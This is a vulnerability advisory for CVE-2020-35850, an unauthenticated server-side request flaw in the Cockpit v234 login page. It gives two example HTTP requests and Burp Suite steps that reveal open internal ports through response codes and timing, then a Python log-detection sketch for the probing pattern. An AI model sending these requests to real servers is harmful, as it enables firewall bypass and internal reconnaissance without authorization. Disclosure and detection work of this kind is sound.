Cockpit-Project v234 - Server-Side Request Vulnerability (unauthenticated) CVE-2020-35850

  • Cockpit version: 234
  • OS: Ubuntu 18.04
  • Page: login

An unauthenticated user can detect whether the SSH port, or any other port, is open on a server running the latest version of Cockpit. The vulnerability also lets the user send requests to internal hosts to detect open ports, so firewall configuration can be bypassed, or the server can be used as a gateway by an attacker for port scanning. For example, if the system administrator creates an iptables rule that drops all packets arriving at port 22 or another port, the user can still detect whether port 22 is open. Assume there is a rule under which port 22 is open only for 127.0.0.1 (the loopback interface).

First HTTP Request:

GET /cockpit+=192.168.1.27:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted

Second HTTP Request:

GET /cockpit+=127.0.0.1:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted

Steps to reproduce:

On the login panel:

  1. Click Other Options.
  2. Enter 127.0.0.1 in the Connect to field and send a request with incorrect credentials.
  3. Intercept the request with Burp Suite.
  4. If the SSH service is open on port 22 and the credentials are wrong, the server returns a "401 Authentication Failed" response.
  5. If the user tries to connect to a port that accepts data for an SSH connection, the server returns a "401 Authentication failed: no-host" response and waits 10 seconds.
  6. If the user tries to connect to a closed port, the server returns a "401 Authentication failed: no-host" response without waiting.
  7. If the SSH service is open on port 22 and the credentials are correct, the server returns a "200" response.
  8. Open ports on an internal server or on the loopback interface of the target server can be detected by changing the remote port number.
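
Detection sketch for the behaviour described above, added here as an example (it is not part of the original advisory or of Cockpit): it reads web access logs for login requests of the form /cockpit+=host:port/login and reports clients whose failed logins span several distinct targets. It assumes a reverse proxy in front of Cockpit writing nginx "combined" logs; the sample lines and the names is_internal, suspicious_clients and min_targets are constructed for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: nginx "combined" access-log lines (assumes a reverse
# proxy in front of Cockpit; addresses and timestamps are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2021:10:00:01 +0000] "GET /cockpit+=127.0.0.1:22/login HTTP/1.1" 401 48 "-" "*"
203.0.113.7 - - [04/Jan/2021:10:00:02 +0000] "GET /cockpit+=127.0.0.1:3306/login HTTP/1.1" 401 48 "-" "*"
203.0.113.7 - - [04/Jan/2021:10:00:03 +0000] "GET /cockpit+=192.168.1.30:5432/login HTTP/1.1" 401 48 "-" "*"
198.51.100.9 - - [04/Jan/2021:10:05:00 +0000] "GET /cockpit+=192.168.1.27:22/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jan/2021:10:05:01 +0000] "GET /cockpit/login HTTP/1.1" 401 48 "-" "Mozilla/5.0"
"""

# Path shape taken from the requests on this page: /cockpit+=<host>[:<port>]/login
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "GET /cockpit\+=(?P<host>[^/:\s"]+)'
    r'(?::(?P<port>\d+))?/login[ ?][^"]*" (?P<status>\d{3}) ')


def is_internal(host):
    """True for loopback/private IP literals and 'localhost'; other names count as external."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_loopback or ip.is_private


def suspicious_clients(log_text, min_targets=3):
    """Report clients whose failed logins cover >= min_targets distinct host:port pairs."""
    # Open and closed ports both answer 401 with wrong credentials, so count 401s only.
    failed = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m["status"] == "401":
            failed[m["client"]].add((m["host"], m["port"] or "default"))
    report = {}
    for client, targets in failed.items():
        if len(targets) >= min_targets:
            report[client] = {
                "targets": sorted(targets),
                "internal": sorted(t for t in targets if is_internal(t[0])),
            }
    return report
```

A single user who mistypes a password against one host stays below the threshold; tune min_targets to the number of hosts operators legitimately reach through the Connect to field.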